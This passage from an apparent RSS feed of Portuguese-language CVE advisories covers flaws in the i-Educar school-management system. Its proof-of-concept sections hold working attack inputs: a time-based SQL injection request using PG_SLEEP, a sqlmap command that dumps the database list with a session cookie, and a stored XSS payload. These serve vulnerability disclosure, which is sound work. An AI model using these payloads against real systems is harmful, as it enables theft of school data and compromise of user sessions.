&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost:8086
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Not)A;Brand&amp;amp;#34;;v=&amp;amp;#34;8&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;138&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Chrome/138.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;text/html,application/xhtml&#43;xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;q=0.8,application/signed-exchange;v=b3;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;requisição-normal&amp;#34;&amp;gt;Requisição normal:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10845/image.png&amp;#34;
	width=&amp;#34;1040&amp;#34;
	height=&amp;#34;561&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10845/image_hu_1f049ffa2d1e5806.png 480w, /p/cve-2025-10845/image_hu_818dd237a2bfb1a8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;444px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;requisição-modificada&amp;#34;&amp;gt;Requisição modificada:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10845/image-1.png&amp;#34;
	width=&amp;#34;1042&amp;#34;
	height=&amp;#34;562&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10845/image-1_hu_87ce56b58b014bee.png 480w, /p/cve-2025-10845/image-1_hu_1763c7a45ffeff1f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;444px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 23 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9532</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9532/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9532/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9532-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-id-do-endpoint-modulecomponentecurricularedit&amp;#34;&amp;gt;CVE-2025-9532: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9532-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-id-do-endpoint-modulecomponentecurricularedit&amp;#34;&amp;gt;CVE-2025-9532: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sqlmap -u &amp;amp;#34;http://localhost:8086/module/ComponenteCurricular/edit?id=8&amp;amp;#34; --cookie=&amp;amp;#34;i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE&amp;amp;#34; --batch --dbs --dbms=postgresql
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10846/image.png&amp;#34;
	width=&amp;#34;568&amp;#34;
	height=&amp;#34;139&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10846/image_hu_46dff48085ff5914.png 480w, /p/cve-2025-10846/image_hu_3f5d69f095c33d40.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;408&amp;#34;
		data-flex-basis=&amp;#34;980px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10846/image-1.png&amp;#34;
	width=&amp;#34;566&amp;#34;
	height=&amp;#34;198&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10846/image-1_hu_fc558fb6fc4f6397.png 480w, /p/cve-2025-10846/image-1_hu_38cb0cffda3c380e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;285&amp;#34;
		data-flex-basis=&amp;#34;686px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 23 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10584</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10584/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10584/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10584-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_calendario_anotacao_cadphp&amp;#34;&amp;gt;CVE-2025-10584: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10584&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10584&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_anotacao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10584-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_calendario_anotacao_cadphp&amp;#34;&amp;gt;CVE-2025-10584: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10584&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10584&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_anotacao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_calendario_anotacao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros:&amp;lt;code&amp;gt;nm_anotacao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nm_anotacao&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10584/image.png&amp;#34;
	width=&amp;#34;506&amp;#34;
	height=&amp;#34;188&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10584/image_hu_2771ca3675e8bb86.png 480w, /p/cve-2025-10584/image_hu_1ae1524d207e0696.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
